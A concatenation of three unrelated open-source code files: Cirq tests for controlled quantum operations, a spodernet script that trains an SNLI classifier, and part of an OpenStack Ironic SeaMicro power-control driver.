    # Control values travel with their qubits when the ordering differs.
    tester.add_equality_group(
        cirq.ControlledOperation(
            [ctrl_a, ctrl_b.with_dimension(3)], cirq.Z(qubit), control_values=[1, (0, 2)]
        ),
        cirq.ControlledOperation(
            [ctrl_b.with_dimension(3), ctrl_a], cirq.Z(qubit), control_values=[(2, 0), 1]
        ),
    )
def test_str():
    """String form uses C prefixes, qudit dimensions, and per-value labels."""
    ctrl1 = cirq.NamedQubit('c1')
    ctrl2 = cirq.NamedQubit('c2')
    target = cirq.NamedQubit('q2')
    assert str(cirq.ControlledOperation([ctrl1], cirq.CZ(ctrl2, target))) == "CCZ(c1, c2, q2)"

    class SingleQubitOp(cirq.Operation):
        def qubits(self) -> Tuple[cirq.Qid, ...]:
            pass

        def with_qubits(self, *new_qubits: cirq.Qid):
            pass

        def __str__(self):
            return "Op(q2)"

    controlled = cirq.ControlledOperation([ctrl1, ctrl2], SingleQubitOp())
    assert str(controlled) == "CC(c1, c2, Op(q2))"
    qudit_controlled = cirq.ControlledOperation([ctrl1, ctrl2.with_dimension(3)], SingleQubitOp())
    assert str(qudit_controlled) == "CC(c1, c2 (d=3), Op(q2))"
    # Non-default control values are spelled out per control.
    valued = cirq.ControlledOperation(
        [ctrl1, ctrl2.with_dimension(3)], SingleQubitOp(), control_values=[1, (2, 0)]
    )
    assert str(valued) == "C1C02(c1, c2 (d=3), Op(q2))"
def test_repr():
    """reprs of controlled operations round-trip through eval."""
    a, b, c, d = cirq.LineQubit.range(4)
    ch = cirq.H(a).controlled_by(b)
    cch = cirq.H(a).controlled_by(b, c)
    ccz = cirq.ControlledOperation([a], cirq.CZ(b, c))
    c1c02z = cirq.ControlledOperation(
        [a, b.with_dimension(3)], cirq.CZ(d, c), control_values=[1, (2, 0)]
    )
    assert repr(ch) == ('cirq.H(cirq.LineQubit(0)).controlled_by(cirq.LineQubit(1))')
    # assert_equivalent_repr checks that eval(repr(x)) == x.
    cirq.testing.assert_equivalent_repr(ch)
    cirq.testing.assert_equivalent_repr(cch)
    cirq.testing.assert_equivalent_repr(ccz)
    cirq.testing.assert_equivalent_repr(c1c02z)
# A contrived multi-qubit Hadamard gate that asserts the consistency of the
# passed-in args, puts an H on every qubit, and displays each of them as
# 'H(qubit)' on the wire.
class MultiH(cirq.Gate):
    """Multi-qubit gate drawn as connected 'H(qubit)' wire symbols."""

    def __init__(self, num_qubits):
        self._n = num_qubits

    def num_qubits(self) -> int:
        return self._n

    def _circuit_diagram_info_(
        self, args: protocols.CircuitDiagramInfoArgs
    ) -> protocols.CircuitDiagramInfo:
        # The diagram machinery must tell us which qubits we are drawn on.
        assert args.known_qubit_count is not None
        assert args.known_qubits is not None
        symbols = tuple(f'H({q})' for q in args.known_qubits)
        return protocols.CircuitDiagramInfo(wire_symbols=symbols, connected=True)
def test_circuit_diagram():
    """Controls render as '@' (or value tuples for qudits) above the sub-gate."""
    qubits = cirq.LineQubit.range(3)
    c = cirq.Circuit()
    c.append(cirq.ControlledOperation(qubits[:1], MultiH(2)(*qubits[1:])))
    cirq.testing.assert_has_diagram(
        c,
        """
0: ───@──────
      │
1: ───H(1)───
      │
2: ───H(2)───
""",
    )
    c = cirq.Circuit()
    c.append(cirq.ControlledOperation(qubits[:2], MultiH(1)(*qubits[2:])))
    cirq.testing.assert_has_diagram(
        c,
        """
0: ───@──────
      │
1: ───@──────
      │
2: ───H(2)───
""",
    )
    # Qudit controls display their accepted value tuples instead of '@'.
    qubits = cirq.LineQid.for_qid_shape((3, 3, 3, 2))
    c = cirq.Circuit()
    c.append(
        cirq.ControlledOperation(
            qubits[:3], MultiH(1)(*qubits[3:]), control_values=[1, (0, 1), (2, 0)]
        )
    )
    cirq.testing.assert_has_diagram(
        c,
        """
0 (d=3): ───@────────────
            │
1 (d=3): ───(0,1)────────
            │
2 (d=3): ───(0,2)────────
            │
3 (d=2): ───H(3 (d=2))───
""",
    )
class MockGate(cirq.testing.TwoQubitGate):
    """Two-qubit gate that records the diagram args it was drawn with."""

    def __init__(self, exponent_qubit_index=None):
        self._exponent_qubit_index = exponent_qubit_index

    def _circuit_diagram_info_(
        self, args: protocols.CircuitDiagramInfoArgs
    ) -> protocols.CircuitDiagramInfo:
        # Stash the args so tests can inspect what the drawing code passed in.
        self.captured_diagram_args = args
        return cirq.CircuitDiagramInfo(
            wire_symbols=('M1', 'M2'),
            exponent=1,
            exponent_qubit_index=self._exponent_qubit_index,
            connected=True,
        )
def test_controlled_diagram_exponent():
    """The exponent label shifts past the controls to the requested sub-gate qubit."""
    for ordering in itertools.permutations(cirq.LineQubit.range(5)):
        for exp_idx in (None, 0, 1):
            op = MockGate(exp_idx)(*ordering[:2]).controlled_by(*ordering[2:])
            offset = exp_idx if exp_idx is not None else 0
            expected = len(ordering[2:]) + offset
            assert cirq.circuit_diagram_info(op).exponent_qubit_index == expected
def test_uninformed_circuit_diagram_info():
    """With uninformed args, controls prepend '@' and shift the exponent index."""
    qubits = cirq.LineQubit.range(3)
    gate = MockGate()
    controlled = cirq.ControlledOperation(qubits[:1], gate(*qubits[1:]))
    uninformed = protocols.CircuitDiagramInfoArgs.UNINFORMED_DEFAULT
    expected = cirq.CircuitDiagramInfo(
        wire_symbols=('@', 'M1', 'M2'), exponent=1, connected=True, exponent_qubit_index=1
    )
    assert cirq.circuit_diagram_info(controlled, uninformed) == expected
    # The sub-gate must have been handed the very same args object.
    assert gate.captured_diagram_args == uninformed
def test_non_diagrammable_subop():
    """Controlling an op that has no diagram info yields no diagram info."""
    control, target = cirq.LineQubit.range(2)

    class UndiagrammableGate(cirq.SingleQubitGate):
        pass

    controlled = cirq.ControlledOperation([control], UndiagrammableGate()(target))
    assert cirq.circuit_diagram_info(controlled, default=None) is None
@pytest.mark.parametrize(
    'gate',
    [
        cirq.X(cirq.NamedQubit('q1')),
        cirq.X(cirq.NamedQubit('q1')) ** 0.5,
        cirq.rx(np.pi)(cirq.NamedQubit('q1')),
        cirq.rx(np.pi / 2)(cirq.NamedQubit('q1')),
        cirq.Z(cirq.NamedQubit('q1')),
        cirq.H(cirq.NamedQubit('q1')),
        cirq.CNOT(cirq.NamedQubit('q1'), cirq.NamedQubit('q2')),
        cirq.SWAP(cirq.NamedQubit('q1'), cirq.NamedQubit('q2')),
        cirq.CCZ(cirq.NamedQubit('q1'), cirq.NamedQubit('q2'), cirq.NamedQubit('q3')),
        cirq.ControlledGate(cirq.ControlledGate(cirq.CCZ))(*cirq.LineQubit.range(5)),
        GateUsingWorkspaceForApplyUnitary()(cirq.NamedQubit('q1')),
        GateAllocatingNewSpaceForResult()(cirq.NamedQubit('q1')),
    ],
)
def test_controlled_operation_is_consistent(gate: cirq.GateOperation):
    """Protocol consistency for qubit, value-0, and qutrit-controlled variants."""
    cb = cirq.NamedQubit('ctr')
    cgate = cirq.ControlledOperation([cb], gate)
    cirq.testing.assert_implements_consistent_protocols(cgate)
    cgate = cirq.ControlledOperation([cb], gate, control_values=[0])
    cirq.testing.assert_implements_consistent_protocols(cgate)
    cb3 = cb.with_dimension(3)
    cgate = cirq.ControlledOperation([cb3], gate, control_values=[(0, 2)])
    cirq.testing.assert_implements_consistent_protocols(cgate)
@pytest.mark.parametrize('resolve_fn', [cirq.resolve_parameters, cirq.resolve_parameters_once])
def test_parameterizable(resolve_fn):
    """Resolving the symbol 'a' to 1 turns controlled Z**a into controlled Z."""
    symbol = sympy.Symbol('a')
    q0, q1, _ = cirq.LineQubit.range(3)
    cz = cirq.ControlledOperation([q0], cirq.Z(q1))
    cza = cirq.ControlledOperation([q0], cirq.ZPowGate(exponent=symbol)(q1))
    assert cirq.is_parameterized(cza)
    assert not cirq.is_parameterized(cz)
    assert resolve_fn(cza, cirq.ParamResolver({'a': 1})) == cz
def test_bounded_effect():
    """Trace-distance bounds: tiny powers are tiny; symbolic/opaque ops max out at 1."""
    q0, q1, q2 = cirq.LineQubit.range(3)
    cy = cirq.ControlledOperation([q0], cirq.Y(q1))
    assert cirq.trace_distance_bound(cy ** 0.001) < 0.01
    foo = sympy.Symbol('foo')
    symbolic = cirq.ControlledOperation([q0], cirq.Y(q1) ** foo)
    assert cirq.trace_distance_bound(symbolic) == 1.0
    assert cirq.approx_eq(cirq.trace_distance_bound(cy), 1.0)
    opaque = cirq.ControlledOperation([q0], MockGate().on(q1, q2))
    assert cirq.approx_eq(cirq.trace_distance_bound(opaque), 1)
def test_controlled_operation_gate():
    """op.gate round-trips for gate-backed ops and is None for gateless ones."""
    gate = cirq.X.controlled(control_values=[0, 1], control_qid_shape=[2, 3])
    op = gate.on(cirq.LineQubit(0), cirq.LineQid(1, 3), cirq.LineQubit(2))
    assert op.gate == gate

    class Gateless(cirq.Operation):
        @property
        def qubits(self):
            return ()  # coverage: ignore

        def with_qubits(self, *new_qubits):
            return self  # coverage: ignore

    gateless_op = Gateless().controlled_by(cirq.LineQubit(0))
    assert gateless_op.gate is None
def test_controlled_mixture():
    """Mixture protocol: unsupported sub-op -> no mixture; phase flip -> CZ mixture."""
    a, b = cirq.LineQubit.range(2)

    class NoDetails(cirq.Operation):
        @property
        def qubits(self):
            return (a,)

        def with_qubits(self, *new_qubits):
            raise NotImplementedError()

    c_no = cirq.ControlledOperation(
        controls=[b],
        sub_operation=NoDetails(),
    )
    assert not cirq.has_mixture(c_no)
    assert cirq.mixture(c_no, None) is None
    c_yes = cirq.ControlledOperation(
        controls=[b],
        sub_operation=cirq.phase_flip(0.25).on(a),
    )
    assert cirq.has_mixture(c_yes)
    # Controlled phase flip: identity with prob 0.75, CZ with prob 0.25.
    assert cirq.approx_eq(
        cirq.mixture(c_yes),
        [
            (0.75, np.eye(4)),
            (0.25, cirq.unitary(cirq.CZ)),
        ],
    )
def test_setters_deprecated():
    """Mutating sub_operation/controls/control_values warns but still takes effect."""
    q0, q1, q2 = cirq.LineQubit.range(3)
    op = cirq.ControlledOperation([q1], cirq.Z(q0))
    with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
        op.sub_operation = cirq.X(q0)
    assert op.sub_operation == cirq.X(q0)
    with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
        op.controls = (q2,)
    assert op.controls == (q2,)
    with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
        op.control_values = ((3,), (3,))
    assert op.control_values == ((3,), (3,))
|
<gh_stars>10-100
'''This module is an example of training a classifier on SNLI'''
from __future__ import print_function

import json
import os
import sys
import urllib
import zipfile
from os.path import join

import nltk
import numpy as np

from spodernet.hooks import AccuracyHook, LossHook, ETAHook
from spodernet.preprocessing.pipeline import Pipeline
from spodernet.preprocessing.processors import AddToVocab, CreateBinsByNestedLength, SaveLengthsToState, ConvertTokenToIdx, StreamToHDF5, Tokenizer, NaiveNCharTokenizer
from spodernet.preprocessing.processors import JsonLoaderProcessors, DictKey2ListMapper, RemoveLineOnJsonValueCondition, ToLower
from spodernet.preprocessing.batching import StreamBatcher
from spodernet.utils.logger import Logger, LogLevel
from spodernet.utils.global_config import Config, Backends
from spodernet.utils.util import get_data_path
from spodernet.frontend import Model, PairedBiDirectionalLSTM, SoftmaxCrossEntropy, Embedding, Trainer
# Parse command-line overrides into the global Config and keep numpy output readable.
Config.parse_argv(sys.argv)
np.set_printoptions(suppress=True)
def download_snli():
    '''Create data/snli paths, download SNLI if needed, and open the archive.

    Returns:
        (archive, snli_dir): an open ``zipfile.ZipFile`` for snli_1.0.zip and
        the directory where the preprocessed SNLI files are kept.
    '''
    home = os.environ['HOME']
    data_dir = join(home, '.data')
    snli_dir = join(data_dir, 'snli')
    snli_url = 'http://nlp.stanford.edu/projects/snli/snli_1.0.zip'
    if not os.path.exists(data_dir):
        os.mkdir(data_dir)
    if not os.path.exists(snli_dir):
        os.mkdir(snli_dir)
    zip_path = join(data_dir, 'snli_1.0.zip')
    if not os.path.exists(zip_path):
        print('Downloading SNLI...')
        # Bug fix: urllib.URLopener exists only on Python 2; urlretrieve
        # covers both major versions.
        try:
            from urllib.request import urlretrieve  # Python 3
        except ImportError:
            from urllib import urlretrieve  # Python 2
        urlretrieve(snli_url, zip_path)
    # Bug fix: the archive must be opened even when the zip already exists;
    # previously these lines only ran after a fresh download, leaving
    # `archive` unbound on every later invocation.
    print('Opening zip file...')
    archive = zipfile.ZipFile(zip_path, 'r')
    return archive, snli_dir
def snli2json():
    '''Preprocess the SNLI jsonl files into [premise, hypothesis, target] lines.

    Returns:
        [names, paths]: the split names ('train'/'dev'/'test') and the paths
        of the converted .data files inside the snli directory.
    '''
    files = ['snli_1.0_train.jsonl', 'snli_1.0_dev.jsonl',
             'snli_1.0_test.jsonl']
    archive, snli_dir = download_snli()
    new_files = ['train.data', 'dev.data', 'test.data']
    names = ['train', 'dev', 'test']
    if not os.path.exists(join(snli_dir, new_files[0])):
        for name, new_name in zip(files, new_files):
            print('Writing {0}...'.format(new_name))
            # Bug fix: reuse the archive returned by download_snli(); the old
            # code re-opened the zip via the undefined name `data_dir`.
            # Zip member paths always use '/' regardless of the OS separator.
            snli_file = archive.open('snli_1.0/' + name, 'r')
            with open(join(snli_dir, new_name), 'w') as datafile:
                for line in snli_file:
                    data = json.loads(line)
                    if data['gold_label'] == '-':
                        # Skip examples without an annotator consensus label.
                        continue
                    premise = data['sentence1']
                    hypothesis = data['sentence2']
                    target = data['gold_label']
                    datafile.write(
                        json.dumps([premise, hypothesis, target]) + '\n')
    return [names, [join(snli_dir, new_name) for new_name in new_files]]
def preprocess_SNLI(delete_data=False):
    """Tokenize SNLI and stream it to HDF5 via three spodernet pipelines.

    Each split (train/dev/test) is processed in two passes: pass 1 records
    sample lengths (train additionally builds the vocabulary); pass 2 converts
    tokens to indices and writes the batched HDF5 output.

    :param delete_data: when True, previously preprocessed data for the
        'snli_example' pipeline is deleted and rebuilt.
    """
    # load data
    #names, file_paths = snli2json()
    #train_path, dev_path, test_path = file_paths
    tokenizer = nltk.tokenize.WordPunctTokenizer()
    zip_path = join(get_data_path(), 'snli_1.0.zip', 'snli_1.0')
    file_paths = ['snli_1.0_train.jsonl', 'snli_1.0_dev.jsonl', 'snli_1.0_test.jsonl']
    not_t = []
    # Sample fields that get sentence-level processing (lowercase + tokenize).
    t = ['input', 'support', 'target']
    # tokenize and convert to hdf5
    # 1. Setup pipeline to save lengths and generate vocabulary
    p = Pipeline('snli_example', delete_data)
    p.add_path(join(zip_path, file_paths[0]))
    p.add_line_processor(JsonLoaderProcessors())
    # Drop examples without annotator consensus ('-' gold label).
    p.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
    p.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
    p.add_sent_processor(ToLower())
    p.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p.add_token_processor(AddToVocab())
    p.add_post_processor(SaveLengthsToState())
    p.execute()
    p.clear_processors()
    p.state['vocab'].save_to_disk()
    # 2. Process the data further to stream it to hdf5
    p.add_sent_processor(ToLower())
    p.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p.add_post_processor(ConvertTokenToIdx())
    # Training samples are bucketed by length for efficient batching.
    p.add_post_processor(CreateBinsByNestedLength('snli_train', min_batch_size=128))
    state = p.execute()
    # dev and test data
    # Dev/test reuse the train vocabulary (no AddToVocab in these pipelines).
    p2 = Pipeline('snli_example')
    p2.copy_vocab_from_pipeline(p)
    p2.add_path(join(zip_path, file_paths[1]))
    p2.add_line_processor(JsonLoaderProcessors())
    p2.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
    p2.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
    p2.add_sent_processor(ToLower())
    p2.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p2.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p2.add_post_processor(SaveLengthsToState())
    p2.execute()
    p2.clear_processors()
    p2.add_sent_processor(ToLower())
    p2.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p2.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p2.add_post_processor(ConvertTokenToIdx())
    p2.add_post_processor(StreamToHDF5('snli_dev'))
    p2.execute()
    p3 = Pipeline('snli_example')
    p3.copy_vocab_from_pipeline(p)
    p3.add_path(join(zip_path, file_paths[2]))
    p3.add_line_processor(JsonLoaderProcessors())
    p3.add_line_processor(RemoveLineOnJsonValueCondition('gold_label', lambda label: label == '-'))
    p3.add_line_processor(DictKey2ListMapper(['sentence1', 'sentence2', 'gold_label']))
    p3.add_sent_processor(ToLower())
    p3.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p3.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p3.add_post_processor(SaveLengthsToState())
    p3.execute()
    p3.clear_processors()
    p3.add_sent_processor(ToLower())
    p3.add_sent_processor(Tokenizer(tokenizer.tokenize), t)
    #p3.add_sent_processor(NaiveNCharTokenizer(3), not_t)
    p3.add_post_processor(ConvertTokenToIdx())
    p3.add_post_processor(StreamToHDF5('snli_test'))
    p3.execute()
def main():
    """Train a paired bidirectional LSTM classifier on preprocessed SNLI."""
    Logger.GLOBAL_LOG_LEVEL = LogLevel.INFO
    #Config.backend = Backends.TENSORFLOW
    Config.backend = Backends.TORCH
    Config.cuda = True
    Config.dropout = 0.1
    Config.hidden_size = 128
    Config.embedding_size = 256
    Config.L2 = 0.00003
    # Flip to True to (re)run preprocessing before training.
    do_process = False
    if do_process:
        preprocess_SNLI(delete_data=True)
    # Load the vocabulary produced by preprocess_SNLI.
    p = Pipeline('snli_example')
    vocab = p.state['vocab']
    vocab.load_from_disk()
    batch_size = 128
    if Config.backend == Backends.TENSORFLOW:
        from spodernet.backends.tfbackend import TensorFlowConfig
        TensorFlowConfig.init_batch_size(batch_size)
    train_batcher = StreamBatcher('snli_example', 'snli_train', batch_size, randomize=True, loader_threads=8)
    #train_batcher.subscribe_to_batch_prepared_event(SomeExpensivePreprocessing())
    dev_batcher = StreamBatcher('snli_example', 'snli_dev', batch_size)
    test_batcher = StreamBatcher('snli_example', 'snli_test', batch_size)
    # Accuracy is reported during training and on the dev set; ETA on train.
    train_batcher.subscribe_to_events(AccuracyHook('Train', print_every_x_batches=1000))
    dev_batcher.subscribe_to_events(AccuracyHook('Dev', print_every_x_batches=1000))
    eta = ETAHook(print_every_x_batches=1000)
    train_batcher.subscribe_to_events(eta)
    train_batcher.subscribe_to_start_of_epoch_event(eta)
    model = Model()
    model.add(Embedding(128, vocab.num_embeddings))
    model.add(PairedBiDirectionalLSTM(128, hidden_size=256, variable_length=True, conditional_encoding=False))
    # 256*4: both directions of both sentences are concatenated before softmax.
    model.add(SoftmaxCrossEntropy(input_size=256*4, num_labels=3))
    t = Trainer(model)
    # Train for 10 epochs, evaluating on dev after each epoch.
    for i in range(10):
        t.train(train_batcher, epochs=1)
        t.evaluate(dev_batcher)
if __name__ == '__main__':
    main()
|
<reponame>pyrrrat/moved-ironic
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Ironic SeaMicro interfaces.
Provides basic power control of servers in SeaMicro chassis via
python-seamicroclient.
Provides vendor passthru methods for SeaMicro specific functionality.
"""
import os
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import importutils
import six
from six.moves.urllib import parse as urlparse
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers import base
from ironic.drivers.modules import console_utils
seamicroclient = importutils.try_import('seamicroclient')
if seamicroclient:
from seamicroclient import client as seamicro_client
from seamicroclient import exceptions as seamicro_client_exception
# Config options registered under the [seamicro] group.
opts = [
    cfg.IntOpt('max_retry',
               default=3,
               help=_('Maximum retries for SeaMicro operations')),
    cfg.IntOpt('action_timeout',
               default=10,
               help=_('Seconds to wait for power action to be completed'))
]
CONF = cfg.CONF
opt_group = cfg.OptGroup(name='seamicro',
                         title='Options for the seamicro power driver')
CONF.register_group(opt_group)
CONF.register_opts(opts, opt_group)
LOG = logging.getLogger(__name__)
# Maps ironic's generic boot device names to SeaMicro boot-order values.
_BOOT_DEVICES_MAP = {
    boot_devices.DISK: 'hd0',
    boot_devices.PXE: 'pxe',
}
# driver_info keys that must be present for this driver to operate.
REQUIRED_PROPERTIES = {
    'seamicro_api_endpoint': _("API endpoint. Required."),
    'seamicro_password': _("password. Required."),
    'seamicro_server_id': _("server ID. Required."),
    'seamicro_username': _("username. Required."),
}
OPTIONAL_PROPERTIES = {
    'seamicro_api_version': _("version of SeaMicro API client; default is 2. "
                              "Optional.")
}
# Union of required and optional keys, advertised by get_properties().
COMMON_PROPERTIES = REQUIRED_PROPERTIES.copy()
COMMON_PROPERTIES.update(OPTIONAL_PROPERTIES)
CONSOLE_PROPERTIES = {
    'seamicro_terminal_port': _("node's UDP port to connect to. "
                                "Only required for console access.")
}
# Base telnet port; get_telnet_port() adds 10 * server_id to this.
PORT_BASE = 2000
def _get_client(*args, **kwargs):
    """Build and return a python-seamicroclient API client.

    :param kwargs: keyword arguments holding the 'username', 'password',
        'api_endpoint' and 'api_version' entries.
    :returns: SeaMicro API client.
    :raises: InvalidParameterValue when the requested API version is not
        supported by the client library.
    """
    client_kwargs = dict(username=kwargs['username'],
                         password=kwargs['password'],
                         auth_url=kwargs['api_endpoint'])
    try:
        return seamicro_client.Client(kwargs['api_version'], **client_kwargs)
    except seamicro_client_exception.UnsupportedVersion as e:
        raise exception.InvalidParameterValue(_(
            "Invalid 'seamicro_api_version' parameter. Reason: %s.") % e)
def _parse_driver_info(node):
    """Parses and creates seamicro driver info

    :param node: An Ironic node object.
    :returns: SeaMicro driver info dict with 'username', 'password',
        'api_endpoint', 'server_id', 'api_version', 'uuid' and 'port' keys.
    :raises: MissingParameterValue if any required parameters are missing.
    :raises: InvalidParameterValue if required parameter are invalid.
    """
    info = node.driver_info or {}
    missing_info = [key for key in REQUIRED_PROPERTIES if not info.get(key)]
    if missing_info:
        raise exception.MissingParameterValue(_(
            "SeaMicro driver requires the following parameters to be set in"
            " node's driver_info: %s.") % missing_info)

    api_endpoint = info.get('seamicro_api_endpoint')
    username = info.get('seamicro_username')
    # FIX: this previously read info.get('<PASSWORD>'), which always
    # returned None even though 'seamicro_password' is validated as a
    # required property above; the credential must come from that key.
    password = info.get('seamicro_password')
    server_id = info.get('seamicro_server_id')
    api_version = info.get('seamicro_api_version', "2")
    port = info.get('seamicro_terminal_port')

    if port is not None:
        port = utils.validate_network_port(port, 'seamicro_terminal_port')

    # server_id identifies a card/slot pair and must look like "<int>/<int>".
    r = re.compile(r"(^[0-9]+)/([0-9]+$)")
    if not r.match(server_id):
        raise exception.InvalidParameterValue(_(
            "Invalid 'seamicro_server_id' parameter in node's "
            "driver_info. Expected format of 'seamicro_server_id' "
            "is <int>/<int>"))

    # Only plain http endpoints with a host component are accepted.
    url = urlparse.urlparse(api_endpoint)
    if (not (url.scheme == "http") or not url.netloc):
        raise exception.InvalidParameterValue(_(
            "Invalid 'seamicro_api_endpoint' parameter in node's "
            "driver_info."))

    res = {'username': username,
           'password': password,
           'api_endpoint': api_endpoint,
           'server_id': server_id,
           'api_version': api_version,
           'uuid': node.uuid,
           'port': port}

    return res
def _get_server(driver_info):
    """Look up and return the SeaMicro server named by driver_info."""
    client = _get_client(**driver_info)
    return client.servers.get(driver_info['server_id'])
def _get_volume(driver_info, volume_id):
    """Look up and return the SeaMicro volume with the given id."""
    client = _get_client(**driver_info)
    return client.volumes.get(volume_id)
def _get_power_status(node):
    """Return the current power state of a node.

    :param node: Ironic node one of :class:`ironic.db.models.Node`
    :raises: InvalidParameterValue if a seamicro parameter is invalid.
    :raises: MissingParameterValue if required seamicro parameters are
        missing.
    :raises: NodeNotFound if the server cannot be located.
    :raises: ServiceUnavailable on an error from SeaMicro Client.
    :returns: Power state of the given node
    """
    seamicro_info = _parse_driver_info(node)
    try:
        server = _get_server(seamicro_info)
        active = getattr(server, 'active', None)
        # A missing or None 'active' flag means the state is unknown.
        if active is None:
            return states.ERROR
        return states.POWER_ON if active else states.POWER_OFF
    except seamicro_client_exception.NotFound:
        raise exception.NodeNotFound(node=node.uuid)
    except seamicro_client_exception.ClientException as ex:
        LOG.error(_LE("SeaMicro client exception %(msg)s for node %(uuid)s"),
                  {'msg': ex.message, 'uuid': node.uuid})
        raise exception.ServiceUnavailable(message=ex.message)
def _power_on(node, timeout=None):
    """Power ON this node

    :param node: An Ironic node object.
    :param timeout: Time in seconds to wait till power on is complete.
    :raises: InvalidParameterValue if a seamicro parameter is invalid.
    :raises: MissingParameterValue if required seamicro parameters are
        missing.
    :returns: Power state of the given node.
    """
    if timeout is None:
        timeout = CONF.seamicro.action_timeout
    # Single-element lists so the nested callback can mutate these values
    # (the closure cannot rebind outer locals directly).
    state = [None]
    retries = [0]
    seamicro_info = _parse_driver_info(node)
    server = _get_server(seamicro_info)
    def _wait_for_power_on(state, retries):
        """Called at an interval until the node is powered on."""
        state[0] = _get_power_status(node)
        if state[0] == states.POWER_ON:
            raise loopingcall.LoopingCallDone()
        # Give up after max_retry attempts and report ERROR.
        if retries[0] > CONF.seamicro.max_retry:
            state[0] = states.ERROR
            raise loopingcall.LoopingCallDone()
        try:
            retries[0] += 1
            server.power_on()
        except seamicro_client_exception.ClientException:
            # Best-effort: a failed attempt is logged and retried on the
            # next tick until max_retry is exceeded.
            LOG.warning(_LW("Power-on failed for node %s."),
                        node.uuid)
    timer = loopingcall.FixedIntervalLoopingCall(_wait_for_power_on,
                                                 state, retries)
    timer.start(interval=timeout).wait()
    return state[0]
def _power_off(node, timeout=None):
    """Power OFF this node

    :param node: Ironic node one of :class:`ironic.db.models.Node`
    :param timeout: Time in seconds to wait till power off is compelete
    :raises: InvalidParameterValue if a seamicro parameter is invalid.
    :raises: MissingParameterValue if required seamicro parameters are
        missing.
    :returns: Power state of the given node
    """
    if timeout is None:
        timeout = CONF.seamicro.action_timeout
    # Single-element lists so the nested callback can mutate these values.
    state = [None]
    retries = [0]
    seamicro_info = _parse_driver_info(node)
    server = _get_server(seamicro_info)
    def _wait_for_power_off(state, retries):
        """Called at an interval until the node is powered off."""
        state[0] = _get_power_status(node)
        if state[0] == states.POWER_OFF:
            raise loopingcall.LoopingCallDone()
        # Give up after max_retry attempts and report ERROR.
        if retries[0] > CONF.seamicro.max_retry:
            state[0] = states.ERROR
            raise loopingcall.LoopingCallDone()
        try:
            retries[0] += 1
            server.power_off()
        except seamicro_client_exception.ClientException:
            # Best-effort: failures are logged and retried on the next tick.
            LOG.warning(_LW("Power-off failed for node %s."),
                        node.uuid)
    timer = loopingcall.FixedIntervalLoopingCall(_wait_for_power_off,
                                                 state, retries)
    timer.start(interval=timeout).wait()
    return state[0]
def _reboot(node, timeout=None):
    """Reboot this node.

    :param node: Ironic node one of :class:`ironic.db.models.Node`
    :param timeout: Time in seconds to wait till reboot is compelete
    :raises: InvalidParameterValue if a seamicro parameter is invalid.
    :raises: MissingParameterValue if required seamicro parameters are
        missing.
    :returns: Power state of the given node
    """
    if timeout is None:
        timeout = CONF.seamicro.action_timeout
    # Single-element lists so the nested callback can mutate these values.
    state = [None]
    retries = [0]
    seamicro_info = _parse_driver_info(node)
    server = _get_server(seamicro_info)
    def _wait_for_reboot(state, retries):
        """Called at an interval until the node is rebooted successfully."""
        state[0] = _get_power_status(node)
        if state[0] == states.POWER_ON:
            raise loopingcall.LoopingCallDone()
        if retries[0] > CONF.seamicro.max_retry:
            state[0] = states.ERROR
            raise loopingcall.LoopingCallDone()
        try:
            retries[0] += 1
            server.reset()
        except seamicro_client_exception.ClientException:
            LOG.warning(_LW("Reboot failed for node %s."),
                        node.uuid)
    timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot,
                                                 state, retries)
    # Kick off the reset before polling starts: the wait callback returns as
    # soon as it observes POWER_ON, so without this initial reset a node that
    # is already running would never actually be rebooted. The callback only
    # re-issues reset() on retries where power has not come back.
    server.reset()
    timer.start(interval=timeout).wait()
    return state[0]
def _validate_volume(driver_info, volume_id):
    """Validates if volume is in Storage pools designated for ironic."""
    volume = _get_volume(driver_info, volume_id)
    # Volume ids follow the <scard>/ironic-<pool_id>/<volume_id> naming
    # scheme; the middle segment marks pools reserved for ironic.
    try:
        pool_id = volume.id.split('/')[1].lower()
    except IndexError:
        pool_id = ""
    if "ironic-" not in pool_id:
        raise exception.InvalidParameterValue(_(
            "Invalid volume id specified"))
    return True
def _get_pools(driver_info, filters=None):
    """Return the SeaMicro storage pools matching the given filters."""
    client = _get_client(**driver_info)
    return client.pools.list(filters=filters)
def _create_volume(driver_info, volume_size):
    """Create volume in the SeaMicro storage pools designated for ironic."""
    # Only pools following the "ironic-" naming scheme are eligible.
    ironic_pools = _get_pools(driver_info, filters={'id': 'ironic-'})
    if ironic_pools is None:
        raise exception.VendorPassthruException(_(
            "No storage pools found for ironic"))
    # NOTE(review): sorting ascending by freeSize and taking [0] selects the
    # pool with the LEAST free space; if "least used" (i.e. most free space)
    # is the intent the index should be [-1] — confirm against the
    # seamicroclient freeSize semantics before changing.
    least_used_pool = sorted(ironic_pools,
                             key=lambda x: x.freeSize)[0]
    return _get_client(**driver_info).volumes.create(volume_size,
                                                     least_used_pool)
